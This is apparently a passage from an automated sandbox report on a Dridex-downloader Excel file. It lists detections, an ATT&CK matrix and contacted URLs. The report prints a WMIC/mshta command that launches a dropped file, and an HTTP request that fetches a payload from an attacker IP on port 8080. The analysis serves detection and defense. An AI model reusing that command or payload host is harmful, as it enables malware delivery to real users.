      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://wus2.contentsync.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 132.148.135.183:8080Connection: Keep-Alive

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\XgQXeAWeoOU.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: payment8642156.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: payment8642156.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000005.00000002.791763115.0000000003320000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default[y
      Found obfuscated Excel 4.0 MacroShow sources
      Source: payment8642156.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 56
      Source: payment8642156.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\XgQXeAWeoOU.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"Jump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E42E00E4-E0D2-4AB8-B96E-18FB013CE40A} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal84.troj.expl.evad.winXLSB@5/9@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: payment8642156.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: payment8642156.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: payment8642156.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: 7A5B4E7.tmp.1.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: 7A5B4E7.tmp.1.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: xgqxeaweoou.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: xgqxeaweoou.rtfJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000008.00000002.947045477.000002288E310000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: mshta.exe, 00000008.00000002.947045477.000002288E310000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000008.00000002.947045477.000002288E310000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: mshta.exe, 00000008.00000002.947045477.000002288E310000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery4Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      payment8642156.xlsb9%ReversingLabsScript-WScript.Malware.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
        high
        https://login.microsoftonline.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
          high
          https://shell.suite.office.com:144389313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
              high
              https://autodiscover-s.outlook.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                high
                https://roaming.edog.89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                • URL Reputation: safe
                unknown
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                  high
                  https://cdn.entity.89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                        high
                        https://powerlift.acompli.net89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v189313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                          high
                          https://cortana.ai89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                    high
                                    https://api.aadrm.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                      high
                                      https://api.microsoftstream.com/api/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                          high
                                          https://cr.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                            high
                                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://portal.office.com/account/?ref=ClientMeControl89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                              high
                                              https://graph.ppe.windows.net89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.aadrm.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                          high
                                                          https://dev0-api.acompli.net/autodetect89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                          high
                                                                          https://ncus.contentsync.89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                      high
                                                                                      https://management.azure.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                        high
                                                                                        https://outlook.office365.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                    high
                                                                                                    https://api.office.net89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/init89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v289313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/mac89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.ai89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.com89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    132.148.135.183
                                                                                                                                                    unknownUnited States
                                                                                                                                                    398101GO-DADDY-COM-LLCUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:528108
                                                                                                                                                    Start date:24.11.2021
                                                                                                                                                    Start time:19:13:02
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 51s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:payment8642156.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:18
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
